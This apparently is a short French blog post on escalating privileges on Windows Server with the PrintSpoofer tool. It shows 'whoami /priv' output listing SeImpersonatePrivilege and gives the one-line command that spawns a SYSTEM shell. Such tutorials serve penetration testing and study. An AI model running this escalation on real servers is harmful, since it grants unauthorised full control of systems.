Exploiter windows server avec PrintSpooler

Il existe quelques exploits populaires pour Windows server. Entre autres, Rotten Potato et PrintSpooler. Voici une introduction brève pour l’export PrintSpooler

Si vous avez les droits SeImersonatePrivilege ou SeAssignPrimaryTokenPrivilege, vous devriez pouvoir exploiter Windows et obtenir les droits AUTHORITY\SYSTEM


whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Vous téléversez PrintSpoofer64.exe ou la version 32 bits et puis vous tapez la commande


PrintSpoofer64.exe -i -c cmd.exe

Voilà!

Leave a Reply